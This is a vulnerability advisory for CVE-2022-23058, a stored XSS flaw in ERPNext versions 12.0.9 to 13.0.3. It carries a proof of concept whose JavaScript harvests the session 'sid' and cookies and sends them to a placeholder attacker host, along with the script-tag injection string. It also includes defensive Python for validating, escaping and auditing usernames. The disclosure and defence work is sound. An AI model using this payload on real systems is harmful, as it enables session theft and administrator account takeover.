Headline
CVE-2022-23058: Mend Vulnerability Database
ERPNext versions v12.0.9 through v13.0.3 are affected by a stored XSS vulnerability that allows low-privileged users to store malicious scripts in the ‘username’ field in ‘My Settings’, which can lead to full account takeover.
Overview
ERPNext versions v12.0.9 through v13.0.3 are vulnerable to stored Cross-Site Scripting (XSS) because user input is not validated properly. A low-privileged attacker can inject arbitrary code into input fields when editing their own profile.
Details
ERPNext is affected by a stored XSS vulnerability that allows low-privileged users to store malicious scripts in the ‘username’ field in ‘My Settings’.
These scripts execute in a victim’s browser when the victim opens a page that renders the vulnerable field. The victim who inadvertently triggers the attack can be a highly privileged user, such as an administrator, so the injected script can extract the sid token and cookies, which can lead to full account takeover and privilege escalation. There is also an availability impact: once the JavaScript payload is stored on the server, the victim is no longer able to browse the platform.
PoC Details
1. Log in to the application as a low-privileged user.
2. Open the settings option in the navigation bar and select My Settings.
3. Enter the malicious script (from the PoC code below) in the ‘username’ field and click Save.
4. Create a file named ‘test1.js’ and serve it with an HTTP server (for example Python’s built-in simple HTTP server).
The content of the ‘test1.js’ file:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
console.log(getSID);
url = 'http://[attacker-ip]:[attacker-port]/?sid=' + getSID;
var script = document.createElement('script');
script.src = url + "&details= " + document.cookie;
document.getElementsByTagName('head')[0].appendChild(script);
5. Open an Incognito tab, go to the ERPNext server and log in as a high-privileged user; the browser is redirected to the malicious page.
6. After a successful login, the ‘sid’ value is sent to the attacker, who can then use it to log in as Administrator.
PoC Code
<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->
Affected Environments
ERPNext versions v12.0.9 through v13.0.3
Prevention
Upgrade to ERPNext version 13.1.0
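For teams that cannot upgrade immediately, or that want to confirm no tainted profile data survives an upgrade, the following Python snippet illustrates the two defensive controls the advisory implies: an allow-list validation of the username at save time and HTML escaping on output, plus an audit helper to flag existing records that already contain markup. It is an added example written for this page, not ERPNext or Frappe code; the record layout, the `SAMPLE_USERS` data and the markup sample inside it are constructed for illustration.

```python
import html
import re

# Constructed sample records (not real ERPNext data): two benign usernames and
# one carrying a script tag of the kind a stored-XSS payload relies on.
SAMPLE_USERS = [
    {"name": "alice@example.com", "username": "alice"},
    {"name": "bob@example.com", "username": "bob_smith-2"},
    {"name": "mallory@example.com",
     "username": "<script src=http://[attacker-ip]/test1.js></script>"},
]

# Allow-list: a username only needs letters, digits, dot, underscore and hyphen.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
# Audit heuristic: tags, HTML comments, entity prefixes or a javascript: scheme
# have no business in a profile field.
MARKUP_RE = re.compile(r"<[^>]*>|<!--|-->|&#|javascript:", re.IGNORECASE)


def is_valid_username(value):
    """Allow-list check; True only for a plain identifier."""
    return bool(USERNAME_RE.match(value))


def looks_like_markup(value):
    """Heuristic used when auditing stored data for HTML/JS markup."""
    return bool(MARKUP_RE.search(value))


def validate_username(value):
    """Server-side validation at save time, the check the advisory says is
    missing.  Raises ValueError so an offending record is never stored."""
    if not is_valid_username(value):
        raise ValueError(
            "username may only contain letters, digits, '.', '_' and '-'")
    return value


def render_username(value):
    """Defence in depth: escape on output so stored text can never become
    markup even if validation was bypassed or predates the fix."""
    return html.escape(value, quote=True)


def audit_users(users):
    """Return the ids of stored User records whose username contains markup
    or fails the allow-list, so they can be cleaned up after patching."""
    return [
        u["name"] for u in users
        if looks_like_markup(u["username"]) or not is_valid_username(u["username"])
    ]


if __name__ == "__main__":
    print("flagged records:", audit_users(SAMPLE_USERS))
    print("escaped rendering:", render_username(SAMPLE_USERS[2]["username"]))
```

Validation on input and escaping on output are deliberately both present: the allow-list stops new payloads from being stored, while escaping protects every page that renders a username that was stored before the fix. The audit function is what you would run once over the User table after upgrading to 13.1.0 to find and clean any records that were already poisoned.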